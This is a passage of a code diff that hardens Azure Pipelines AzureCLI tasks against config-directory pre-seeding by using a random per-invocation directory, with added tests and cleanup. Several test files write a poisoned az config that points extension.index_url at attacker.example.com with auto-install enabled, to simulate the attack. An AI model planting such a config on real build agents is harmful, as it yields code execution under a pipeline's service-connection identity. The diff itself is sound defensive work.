+export function createPerInvocationAzureConfigDir(agentTempDir: string): string {
+    if (!agentTempDir) {
+        throw new Error('agentTempDir is required');
+    }
+    return fs.mkdtempSync(path.join(agentTempDir, '.azclitask-'));
+}
+
+/**
+ * Removes a directory previously created by
+ * createPerInvocationAzureConfigDir and unsets the AZURE_CONFIG_DIR env
+ * var. Safe to call in `finally` — never throws; logs to tl.debug on
+ * failure so a broken cleanup cannot mask the original task error.
+ */
+export function removePerInvocationAzureConfigDir(configPath: string | null | undefined): void {
+    if (!configPath) {
+        return;
+    }
+    tl.debug(`Removing per-invocation AZURE_CONFIG_DIR: ${configPath}`);
+    try {
+        tl.rmRF(configPath);
+    } catch (rmErr) {
+        const msg = (rmErr && (rmErr as Error).message) || String(rmErr);
+        tl.debug(`Failed to remove AZURE_CONFIG_DIR: ${msg}`);
+    }
+    try {
+        delete process.env['AZURE_CONFIG_DIR'];
+    } catch { /* ignore */ }
+}

--- a/_generated/AzureCLIV2_Node24/Tests/L0.ts
+++ b/_generated/AzureCLIV2_Node24/Tests/L0.ts
@@ -4,6 +4,7 @@ import path = require('path');
 import * as ttm from 'azure-pipelines-task-lib/mock-test';
 import { runValidateScriptArgsTests } from './L0ValidateScriptArgs';
 import { runTryValidateScriptArgsTests } from './L0TryValidateScriptArgs';
+import { runConfigDirIsolationTests } from './L0ConfigDirIsolation';
 
 describe('AzureCLIV2 Suite', function () {
     this.timeout(30000);
@@ -14,6 +15,10 @@ describe('AzureCLIV2 Suite', function () {
 
     describe('Args validation feature flag (EnableAzureCliArgsValidation)', () => {
         runTryValidateScriptArgsTests();
+    });
+
+    describe('AZURE_CONFIG_DIR isolation', () => {
+        runConfigDirIsolationTests();
     });
 
     it('LateBoundIdToken: Feature Flag ON, Token Present -> Uses Token, Emits Telemetry', async () => {

--- a/_generated/AzureCLIV2_Node24/Tests/L0ConfigDirIsolation.ts
+++ b/_generated/AzureCLIV2_Node24/Tests/L0ConfigDirIsolation.ts
@@ -1,0 +1,121 @@
+import assert = require('assert');
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from '../src/AzureCliConfigDir';
+
+export function runConfigDirIsolationTests() {
+    describe('createPerInvocationAzureConfigDir (security hardening)', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+        });
+
+        it('creates a brand-new directory under the agent temp root', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert(fs.existsSync(dir), 'config dir should exist on disk');
+                assert(fs.statSync(dir).isDirectory(), 'should be a directory');
+                assert(path.dirname(dir) === fs.realpathSync(agentTemp) || path.dirname(dir) === agentTemp,
+                    `config dir parent should be agent temp, got ${path.dirname(dir)}`);
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('does NOT use the predictable ".azclitask" path that the vulnerable code used', () => {
+            const vulnerablePath = path.join(agentTemp, '.azclitask');
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, vulnerablePath,
+                    'must not use the fixed predictable path attackable by pre-seeding');
+                assert(path.basename(dir).startsWith('.azclitask-'),
+                    `basename should start with ".azclitask-" (got "${path.basename(dir)}")`);
+                assert(path.basename(dir).length > '.azclitask-'.length,
+                    'mkdtemp must append a random suffix');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('produces a different directory on each invocation', () => {
+            const a = createPerInvocationAzureConfigDir(agentTemp);
+            const b = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(a, b, 'two invocations must yield distinct dirs');
+            } finally {
+                fs.rmSync(a, { recursive: true, force: true });
+                fs.rmSync(b, { recursive: true, force: true });
+            }
+        });
+
+        it('ignores an attacker-pre-seeded ".azclitask/config" in the agent temp', () => {
+            // Simulate the exact attack: a prior step writes a poisoned config at the
+            // predictable path the vulnerable task used to point AZURE_CONFIG_DIR at.
+            const poisonedDir = path.join(agentTemp, '.azclitask');
+            fs.mkdirSync(poisonedDir, { recursive: true });
+            const poisonedConfig = path.join(poisonedDir, 'config');
+            fs.writeFileSync(poisonedConfig,
+                '[extension]\nindex_url = https://attacker.example.com/index.json\n' +
+                'use_dynamic_install = yes_without_prompt\n' +
+                'run_after_dynamic_install = True\n');
+
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, poisonedDir,
+                    'new config dir must not be the attacker-controlled predictable path');
+                assert(!fs.existsSync(path.join(dir, 'config')),
+                    'newly-created config dir must not contain a pre-seeded config file');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('throws when agentTempDir is empty/undefined', () => {
+            assert.throws(() => createPerInvocationAzureConfigDir(undefined as any));
+            assert.throws(() => createPerInvocationAzureConfigDir(''));
+        });
+    });
+
+    describe('removePerInvocationAzureConfigDir', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+            delete process.env['AZURE_CONFIG_DIR'];
+        });
+
+        it('removes the directory (even when it contains files left by az)', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            fs.writeFileSync(path.join(dir, 'config'), '[extension]\nindex_url = x\n');
+            fs.mkdirSync(path.join(dir, 'cliextensions'));
+            process.env['AZURE_CONFIG_DIR'] = dir;
+            removePerInvocationAzureConfigDir(dir);
+            assert(!fs.existsSync(dir), 'directory must be gone after cleanup');
+            assert(process.env['AZURE_CONFIG_DIR'] === undefined,
+                'AZURE_CONFIG_DIR env var must be unset after cleanup');
+        });
+
+        it('is a no-op for null/empty inputs (safe in finally)', () => {
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(null));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(undefined));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(''));
+        });
+
+        it('never throws when the path does not exist', () => {
+            const ghost = path.join(agentTemp, '.azclitask-ghost00');
+            assert(!fs.existsSync(ghost));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(ghost));
+        });
+    });
+}

--- a/_generated/AzureCLIV2_Node24/azureclitask.ts
+++ b/_generated/AzureCLIV2_Node24/azureclitask.ts
@@ -10,6 +10,7 @@ import { getHandlerFromToken, WebApi } from "azure-devops-node-api";
 import { ITaskApi } from "azure-devops-node-api/TaskApi";
 import { validateAzModuleVersion } from "azure-pipelines-tasks-azure-arm-rest/azCliUtility";
 import { tryValidateScriptArgs, ArgsSanitizingError } from "./src/argsSanitizer";
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from "./src/AzureCliConfigDir";
 
 const nodeVersion = parseInt(process.version.split('.')[0].replace('v', ''));
 if (nodeVersion > 16) {
@@ -147,12 +148,21 @@ export class azureclitask {
             }
 
             if (scriptType) {
-                await scriptType.cleanUp();
+                try {
+                    await scriptType.cleanUp();
+                } catch (cleanupErr) {
+                    tl.debug(`scriptType.cleanUp() threw: ${cleanupErr && cleanupErr.message || cleanupErr}`);
+                }
             }
 
             if (this.cliPasswordPath) {
                 tl.debug('Removing spn certificate file');
                 tl.rmRF(this.cliPasswordPath);
+            }
+
+            if (this.azCliConfigPath) {
+                removePerInvocationAzureConfigDir(this.azCliConfigPath);
+                this.azCliConfigPath = null;
             }
 
             //set the task result to either succeeded or failed based on error was thrown or not
@@ -223,6 +233,7 @@ export class azureclitask {
 
     private static isLoggedIn: boolean = false;
     private static cliPasswordPath: string = null;
+    private static azCliConfigPath: string = null;
     private static servicePrincipalId: string = null;
     private static servicePrincipalKey: string = null;
     private static federatedToken: string = null;
@@ -354,13 +365,20 @@ export class azureclitask {
             return;
         }
 
-        if (!!tl.getVariable('Agent.TempDirectory')) {
-            var azCliConfigPath = path.join(tl.getVariable('Agent.TempDirectory'), ".azclitask");
-            console.log(tl.loc('SettingAzureConfigDir', azCliConfigPath));
-            process.env['AZURE_CONFIG_DIR'] = azCliConfigPath;
-        } else {
+        const tempDir = tl.getVariable('Agent.TempDirectory');
+        if (!tempDir) {
             console.warn(tl.loc('GlobalCliConfigAgentVersionWarning'));
+            return;
         }
+
+        // Security: use a freshly-created, unpredictable per-invocation directory
+        // so that an earlier step cannot pre-seed $(Agent.TempDirectory)/.azclitask/config
+        // with a poisoned extension.index_url (security hardening).
+        // fs.mkdtempSync creates a brand-new directory; the random suffix prevents
+        // attacker pre-seeding and the tight perms come from the agent temp root.
+        this.azCliConfigPath = createPerInvocationAzureConfigDir(tempDir);
+        console.log(tl.loc('SettingAzureConfigDir', this.azCliConfigPath));
+        process.env['AZURE_CONFIG_DIR'] = this.azCliConfigPath;
     }
 
     private static setAzureCloudBasedOnServiceEndpoint(): void {

--- a/_generated/AzureCLIV2_Node24/src/AzureCliConfigDir.ts
+++ b/_generated/AzureCLIV2_Node24/src/AzureCliConfigDir.ts
@@ -1,0 +1,59 @@
+import * as fs from 'fs';
+import * as path from 'path';
+import * as tl from 'azure-pipelines-task-lib/task';
+
+/**
+ * AZURE_CONFIG_DIR isolation helper for the AzureCLI@1/@2/@3 tasks.
+ *
+ * NOTE: this file is intentionally duplicated under
+ * Tasks/AzureCLIV1/src, Tasks/AzureCLIV2/src and Tasks/AzureCLIV3/src.
+ * Each AzureCLI task is shipped as a self-contained npm package and the
+ * repo convention is to keep small, task-coupled helpers in the task
+ * folder rather than introduce a new shared package. Keep all three
+ * copies in sync when changing this file.
+ *
+ * Background: the legacy code pointed AZURE_CONFIG_DIR at the predictable
+ * path $(Agent.TempDirectory)/.azclitask which allowed any earlier
+ * pipeline step running on the same agent to pre-seed a poisoned `config`
+ * file (e.g. extension.index_url / use_dynamic_install /
+ * run_after_dynamic_install) and achieve code execution under the
+ * service-connection identity once the AzureCLI task subsequently invoked
+ * `az`. Creating a fresh, unpredictable directory per invocation closes
+ * that gap.
+ */
+
+/**
+ * Creates a per-invocation, unpredictable AZURE_CONFIG_DIR under the
+ * supplied agent temp directory. Returns the absolute path. The directory
+ * has the form `${agentTempDir}/.azclitask-XXXXXX` where XXXXXX is six
+ * cryptographically-random alphanumeric characters chosen by libuv
+ * (filesystem-safe on every supported OS).
+ */
+export function createPerInvocationAzureConfigDir(agentTempDir: string): string {
+    if (!agentTempDir) {
+        throw new Error('agentTempDir is required');
+    }
+    return fs.mkdtempSync(path.join(agentTempDir, '.azclitask-'));
+}
+
+/**
+ * Removes a directory previously created by
+ * createPerInvocationAzureConfigDir and unsets the AZURE_CONFIG_DIR env
+ * var. Safe to call in `finally` — never throws; logs to tl.debug on
+ * failure so a broken cleanup cannot mask the original task error.
+ */
+export function removePerInvocationAzureConfigDir(configPath: string | null | undefined): void {
+    if (!configPath) {
+        return;
+    }
+    tl.debug(`Removing per-invocation AZURE_CONFIG_DIR: ${configPath}`);
+    try {
+        tl.rmRF(configPath);
+    } catch (rmErr) {
+        const msg = (rmErr && (rmErr as Error).message) || String(rmErr);
+        tl.debug(`Failed to remove AZURE_CONFIG_DIR: ${msg}`);
+    }
+    try {
+        delete process.env['AZURE_CONFIG_DIR'];
+    } catch { /* ignore */ }
+}

--- a/_generated/AzureCLIV3/Tests/L0.ts
+++ b/_generated/AzureCLIV3/Tests/L0.ts
@@ -3,6 +3,7 @@ import path = require('path');
 import * as ttm from 'azure-pipelines-task-lib/mock-test';
 import { runValidateScriptArgsTests } from './L0ValidateScriptArgs';
 import { runTryValidateScriptArgsTests } from './L0TryValidateScriptArgs';
+import { runConfigDirIsolationTests } from './L0ConfigDirIsolation';
 
 describe('AzureCLIV3 Suite', function () {
     const timeout = 30000;
@@ -19,6 +20,10 @@ describe('AzureCLIV3 Suite', function () {
 
     describe('Args validation feature flag (EnableAzureCliArgsValidation)', () => {
         runTryValidateScriptArgsTests();
+    });
+
+    describe('AZURE_CONFIG_DIR isolation', () => {
+        runConfigDirIsolationTests();
     });
 
     it('Should handle Azure DevOps connection with Workload Identity Federation', function (done) {

--- a/_generated/AzureCLIV3/Tests/L0ConfigDirIsolation.ts
+++ b/_generated/AzureCLIV3/Tests/L0ConfigDirIsolation.ts
@@ -1,0 +1,121 @@
+import assert = require('assert');
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from '../src/AzureCliConfigDir';
+
+export function runConfigDirIsolationTests() {
+    describe('createPerInvocationAzureConfigDir (security hardening)', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+        });
+
+        it('creates a brand-new directory under the agent temp root', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert(fs.existsSync(dir), 'config dir should exist on disk');
+                assert(fs.statSync(dir).isDirectory(), 'should be a directory');
+                assert(path.dirname(dir) === fs.realpathSync(agentTemp) || path.dirname(dir) === agentTemp,
+                    `config dir parent should be agent temp, got ${path.dirname(dir)}`);
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('does NOT use the predictable ".azclitask" path that the vulnerable code used', () => {
+            const vulnerablePath = path.join(agentTemp, '.azclitask');
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, vulnerablePath,
+                    'must not use the fixed predictable path attackable by pre-seeding');
+                assert(path.basename(dir).startsWith('.azclitask-'),
+                    `basename should start with ".azclitask-" (got "${path.basename(dir)}")`);
+                assert(path.basename(dir).length > '.azclitask-'.length,
+                    'mkdtemp must append a random suffix');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('produces a different directory on each invocation', () => {
+            const a = createPerInvocationAzureConfigDir(agentTemp);
+            const b = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(a, b, 'two invocations must yield distinct dirs');
+            } finally {
+                fs.rmSync(a, { recursive: true, force: true });
+                fs.rmSync(b, { recursive: true, force: true });
+            }
+        });
+
+        it('ignores an attacker-pre-seeded ".azclitask/config" in the agent temp', () => {
+            // Simulate the exact attack: a prior step writes a poisoned config at the
+            // predictable path the vulnerable task used to point AZURE_CONFIG_DIR at.
+            const poisonedDir = path.join(agentTemp, '.azclitask');
+            fs.mkdirSync(poisonedDir, { recursive: true });
+            const poisonedConfig = path.join(poisonedDir, 'config');
+            fs.writeFileSync(poisonedConfig,
+                '[extension]\nindex_url = https://attacker.example.com/index.json\n' +
+                'use_dynamic_install = yes_without_prompt\n' +
+                'run_after_dynamic_install = True\n');
+
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, poisonedDir,
+                    'new config dir must not be the attacker-controlled predictable path');
+                assert(!fs.existsSync(path.join(dir, 'config')),
+                    'newly-created config dir must not contain a pre-seeded config file');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('throws when agentTempDir is empty/undefined', () => {
+            assert.throws(() => createPerInvocationAzureConfigDir(undefined as any));
+            assert.throws(() => createPerInvocationAzureConfigDir(''));
+        });
+    });
+
+    describe('removePerInvocationAzureConfigDir', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+            delete process.env['AZURE_CONFIG_DIR'];
+        });
+
+        it('removes the directory (even when it contains files left by az)', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            fs.writeFileSync(path.join(dir, 'config'), '[extension]\nindex_url = x\n');
+            fs.mkdirSync(path.join(dir, 'cliextensions'));
+            process.env['AZURE_CONFIG_DIR'] = dir;
+            removePerInvocationAzureConfigDir(dir);
+            assert(!fs.existsSync(dir), 'directory must be gone after cleanup');
+            assert(process.env['AZURE_CONFIG_DIR'] === undefined,
+                'AZURE_CONFIG_DIR env var must be unset after cleanup');
+        });
+
+        it('is a no-op for null/empty inputs (safe in finally)', () => {
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(null));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(undefined));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(''));
+        });
+
+        it('never throws when the path does not exist', () => {
+            const ghost = path.join(agentTemp, '.azclitask-ghost00');
+            assert(!fs.existsSync(ghost));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(ghost));
+        });
+    });
+}

--- a/_generated/AzureCLIV3/azureclitask.ts
+++ b/_generated/AzureCLIV3/azureclitask.ts
@@ -10,6 +10,7 @@ import { ITaskApi } from "azure-devops-node-api/TaskApi";
 import { validateAzModuleVersion } from "azure-pipelines-tasks-azure-arm-rest/azCliUtility";
 import { emitTelemetry } from 'azure-pipelines-tasks-artifacts-common/telemetry';
 import { tryValidateScriptArgs, ArgsSanitizingError } from "./src/argsSanitizer";
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from "./src/AzureCliConfigDir";
 
 const nodeVersion = parseInt(process.version.split('.')[0].replace('v', ''));
 if (nodeVersion > 16) {
@@ -162,12 +163,21 @@ export class azureclitask {
             }
 
             if (scriptType) {
-                await scriptType.cleanUp();
+                try {
+                    await scriptType.cleanUp();
+                } catch (cleanupErr) {
+                    tl.debug(`scriptType.cleanUp() threw: ${cleanupErr && cleanupErr.message || cleanupErr}`);
+                }
             }
 
             if (this.cliPasswordPath) {
                 tl.debug('Removing spn certificate file');
                 tl.rmRF(this.cliPasswordPath);
+            }
+
+            if (this.azCliConfigPath) {
+                removePerInvocationAzureConfigDir(this.azCliConfigPath);
+                this.azCliConfigPath = null;
             }
 
             //set the task result to either succeeded or failed based on error was thrown or not
@@ -259,6 +269,7 @@ export class azureclitask {
 
     private static isLoggedIn: boolean = false;
     private static cliPasswordPath: string = null;
+    private static azCliConfigPath: string = null;
     private static servicePrincipalId: string = null;
     private static servicePrincipalKey: string = null;
     private static federatedToken: string = null;
@@ -502,10 +513,14 @@ export class azureclitask {
             return;
         }
 
-        if (!!tl.getVariable('Agent.TempDirectory')) {
-            var azCliConfigPath = path.join(tl.getVariable('Agent.TempDirectory'), ".azclitask");
-            console.log(tl.loc('SettingAzureConfigDir', azCliConfigPath));
-            process.env['AZURE_CONFIG_DIR'] = azCliConfigPath;
+        const agentTempDir = tl.getVariable('Agent.TempDirectory');
+        if (!!agentTempDir) {
+            // Security: create an unpredictable per-invocation
+            // directory so an earlier pipeline step cannot pre-seed a poisoned
+            // az config file at $(Agent.TempDirectory)/.azclitask/config.
+            this.azCliConfigPath = createPerInvocationAzureConfigDir(agentTempDir);
+            console.log(tl.loc('SettingAzureConfigDir', this.azCliConfigPath));
+            process.env['AZURE_CONFIG_DIR'] = this.azCliConfigPath;
         } else {
             console.warn(tl.loc('GlobalCliConfigAgentVersionWarning'));
         }

--- a/_generated/AzureCLIV3/src/AzureCliConfigDir.ts
+++ b/_generated/AzureCLIV3/src/AzureCliConfigDir.ts
@@ -1,0 +1,59 @@
+import * as fs from 'fs';
+import * as path from 'path';
+import * as tl from 'azure-pipelines-task-lib/task';
+
+/**
+ * AZURE_CONFIG_DIR isolation helper for the AzureCLI@1/@2/@3 tasks.
+ *
+ * NOTE: this file is intentionally duplicated under
+ * Tasks/AzureCLIV1/src, Tasks/AzureCLIV2/src and Tasks/AzureCLIV3/src.
+ * Each AzureCLI task is shipped as a self-contained npm package and the
+ * repo convention is to keep small, task-coupled helpers in the task
+ * folder rather than introduce a new shared package. Keep all three
+ * copies in sync when changing this file.
+ *
+ * Background: the legacy code pointed AZURE_CONFIG_DIR at the predictable
+ * path $(Agent.TempDirectory)/.azclitask which allowed any earlier
+ * pipeline step running on the same agent to pre-seed a poisoned `config`
+ * file (e.g. extension.index_url / use_dynamic_install /
+ * run_after_dynamic_install) and achieve code execution under the
+ * service-connection identity once the AzureCLI task subsequently invoked
+ * `az`. Creating a fresh, unpredictable directory per invocation closes
+ * that gap.
+ */
+
+/**
+ * Creates a per-invocation, unpredictable AZURE_CONFIG_DIR under the
+ * supplied agent temp directory. Returns the absolute path. The directory
+ * has the form `${agentTempDir}/.azclitask-XXXXXX` where XXXXXX is six
+ * cryptographically-random alphanumeric characters chosen by libuv
+ * (filesystem-safe on every supported OS).
+ */
+export function createPerInvocationAzureConfigDir(agentTempDir: string): string {
+    if (!agentTempDir) {
+        throw new Error('agentTempDir is required');
+    }
+    return fs.mkdtempSync(path.join(agentTempDir, '.azclitask-'));
+}
+
+/**
+ * Removes a directory previously created by
+ * createPerInvocationAzureConfigDir and unsets the AZURE_CONFIG_DIR env
+ * var. Safe to call in `finally` — never throws; logs to tl.debug on
+ * failure so a broken cleanup cannot mask the original task error.
+ */
+export function removePerInvocationAzureConfigDir(configPath: string | null | undefined): void {
+    if (!configPath) {
+        return;
+    }
+    tl.debug(`Removing per-invocation AZURE_CONFIG_DIR: ${configPath}`);
+    try {
+        tl.rmRF(configPath);
+    } catch (rmErr) {
+        const msg = (rmErr && (rmErr as Error).message) || String(rmErr);
+        tl.debug(`Failed to remove AZURE_CONFIG_DIR: ${msg}`);
+    }
+    try {
+        delete process.env['AZURE_CONFIG_DIR'];
+    } catch { /* ignore */ }
+}

--- a/_generated/AzureCLIV3_Node24/Tests/L0.ts
+++ b/_generated/AzureCLIV3_Node24/Tests/L0.ts
@@ -3,6 +3,7 @@ import path = require('path');
 import * as ttm from 'azure-pipelines-task-lib/mock-test';
 import { runValidateScriptArgsTests } from './L0ValidateScriptArgs';
 import { runTryValidateScriptArgsTests } from './L0TryValidateScriptArgs';
+import { runConfigDirIsolationTests } from './L0ConfigDirIsolation';
 
 describe('AzureCLIV3 Suite', function () {
     const timeout = 30000;
@@ -19,6 +20,10 @@ describe('AzureCLIV3 Suite', function () {
 
     describe('Args validation feature flag (EnableAzureCliArgsValidation)', () => {
         runTryValidateScriptArgsTests();
+    });
+
+    describe('AZURE_CONFIG_DIR isolation', () => {
+        runConfigDirIsolationTests();
     });
 
     it('Should handle Azure DevOps connection with Workload Identity Federation', function (done) {

--- a/_generated/AzureCLIV3_Node24/Tests/L0ConfigDirIsolation.ts
+++ b/_generated/AzureCLIV3_Node24/Tests/L0ConfigDirIsolation.ts
@@ -1,0 +1,121 @@
+import assert = require('assert');
+import * as fs from 'fs';
+import * as os from 'os';
+import * as path from 'path';
+
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from '../src/AzureCliConfigDir';
+
+export function runConfigDirIsolationTests() {
+    describe('createPerInvocationAzureConfigDir (security hardening)', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+        });
+
+        it('creates a brand-new directory under the agent temp root', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert(fs.existsSync(dir), 'config dir should exist on disk');
+                assert(fs.statSync(dir).isDirectory(), 'should be a directory');
+                assert(path.dirname(dir) === fs.realpathSync(agentTemp) || path.dirname(dir) === agentTemp,
+                    `config dir parent should be agent temp, got ${path.dirname(dir)}`);
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('does NOT use the predictable ".azclitask" path that the vulnerable code used', () => {
+            const vulnerablePath = path.join(agentTemp, '.azclitask');
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, vulnerablePath,
+                    'must not use the fixed predictable path attackable by pre-seeding');
+                assert(path.basename(dir).startsWith('.azclitask-'),
+                    `basename should start with ".azclitask-" (got "${path.basename(dir)}")`);
+                assert(path.basename(dir).length > '.azclitask-'.length,
+                    'mkdtemp must append a random suffix');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('produces a different directory on each invocation', () => {
+            const a = createPerInvocationAzureConfigDir(agentTemp);
+            const b = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(a, b, 'two invocations must yield distinct dirs');
+            } finally {
+                fs.rmSync(a, { recursive: true, force: true });
+                fs.rmSync(b, { recursive: true, force: true });
+            }
+        });
+
+        it('ignores an attacker-pre-seeded ".azclitask/config" in the agent temp', () => {
+            // Simulate the exact attack: a prior step writes a poisoned config at the
+            // predictable path the vulnerable task used to point AZURE_CONFIG_DIR at.
+            const poisonedDir = path.join(agentTemp, '.azclitask');
+            fs.mkdirSync(poisonedDir, { recursive: true });
+            const poisonedConfig = path.join(poisonedDir, 'config');
+            fs.writeFileSync(poisonedConfig,
+                '[extension]\nindex_url = https://attacker.example.com/index.json\n' +
+                'use_dynamic_install = yes_without_prompt\n' +
+                'run_after_dynamic_install = True\n');
+
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            try {
+                assert.notStrictEqual(dir, poisonedDir,
+                    'new config dir must not be the attacker-controlled predictable path');
+                assert(!fs.existsSync(path.join(dir, 'config')),
+                    'newly-created config dir must not contain a pre-seeded config file');
+            } finally {
+                fs.rmSync(dir, { recursive: true, force: true });
+            }
+        });
+
+        it('throws when agentTempDir is empty/undefined', () => {
+            assert.throws(() => createPerInvocationAzureConfigDir(undefined as any));
+            assert.throws(() => createPerInvocationAzureConfigDir(''));
+        });
+    });
+
+    describe('removePerInvocationAzureConfigDir', () => {
+        let agentTemp: string;
+
+        beforeEach(() => {
+            agentTemp = fs.mkdtempSync(path.join(os.tmpdir(), 'azcli-agenttmp-'));
+        });
+
+        afterEach(() => {
+            try { fs.rmSync(agentTemp, { recursive: true, force: true }); } catch { /* ignore */ }
+            delete process.env['AZURE_CONFIG_DIR'];
+        });
+
+        it('removes the directory (even when it contains files left by az)', () => {
+            const dir = createPerInvocationAzureConfigDir(agentTemp);
+            fs.writeFileSync(path.join(dir, 'config'), '[extension]\nindex_url = x\n');
+            fs.mkdirSync(path.join(dir, 'cliextensions'));
+            process.env['AZURE_CONFIG_DIR'] = dir;
+            removePerInvocationAzureConfigDir(dir);
+            assert(!fs.existsSync(dir), 'directory must be gone after cleanup');
+            assert(process.env['AZURE_CONFIG_DIR'] === undefined,
+                'AZURE_CONFIG_DIR env var must be unset after cleanup');
+        });
+
+        it('is a no-op for null/empty inputs (safe in finally)', () => {
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(null));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(undefined));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(''));
+        });
+
+        it('never throws when the path does not exist', () => {
+            const ghost = path.join(agentTemp, '.azclitask-ghost00');
+            assert(!fs.existsSync(ghost));
+            assert.doesNotThrow(() => removePerInvocationAzureConfigDir(ghost));
+        });
+    });
+}

--- a/_generated/AzureCLIV3_Node24/azureclitask.ts
+++ b/_generated/AzureCLIV3_Node24/azureclitask.ts
@@ -10,6 +10,7 @@ import { ITaskApi } from "azure-devops-node-api/TaskApi";
 import { validateAzModuleVersion } from "azure-pipelines-tasks-azure-arm-rest/azCliUtility";
 import { emitTelemetry } from 'azure-pipelines-tasks-artifacts-common/telemetry';
 import { tryValidateScriptArgs, ArgsSanitizingError } from "./src/argsSanitizer";
+import { createPerInvocationAzureConfigDir, removePerInvocationAzureConfigDir } from "./src/AzureCliConfigDir";
 
 const nodeVersion = parseInt(process.version.split('.')[0].replace('v', ''));
 if (nodeVersion > 16) {
@@ -162,12 +163,21 @@ export class azureclitask {
             }
 
             if (scriptType) {
-                await scriptType.cleanUp();
+                try {
+                    await scriptType.cleanUp();
+                } catch (cleanupErr) {
+                    tl.debug(`scriptType.cleanUp() threw: ${cleanupErr && cleanupErr.message || cleanupErr}`);
+                }
             }
 
             if (this.cliPasswordPath) {
                 tl.debug('Removing spn certificate file');
                 tl.rmRF(this.cliPasswordPath);
+            }
+
+            if (this.azCliConfigPath) {
+                removePerInvocationAzureConfigDir(this.azCliConfigPath);
+                this.azCliConfigPath = null;
             }
 
             //set the task result to either succeeded or failed based on error was thrown or not
@@ -259,6 +269,7 @@ export class azureclitask {
 
     private static isLoggedIn: boolean = false;
     private static cliPasswordPath: string = null;
+    private static azCliConfigPath: string = null;
     private static servicePrincipalId: string = null;
     private static servicePrincipalKey: string = null;
     private static federatedToken: string = null;
@@ -502,10 +513,14 @@ export class azureclitask {
             return;
         }
 
-        if (!!tl.getVariable('Agent.TempDirectory')) {
-            var azCliConfigPath = path.join(tl.getVariable('Agent.TempDirectory'), ".azclitask");
-            console.log(tl.loc('SettingAzureConfigDir', azCliConfigPath));
-            process.env['AZURE_CONFIG_DIR'] = azCliConfigPath;
+        const agentTempDir = tl.getVariable('Agent.TempDirectory');
+        if (!!agentTempDir) {
+            // Security: create an unpredictable per-invocation
+            // directory so an earlier pipeline step cannot pre-seed a poisoned
+            // az config file at $(Agent.TempDirectory)/.azclitask/config.
+            this.azCliConfigPath = createPerInvocationAzureConfigDir(agentTempDir);
+            console.log(tl.loc('SettingAzureConfigDir', this.azCliConfigPath));
+            process.env['AZURE_CONFIG_DIR'] = this.azCliConfigPath;
         } else {
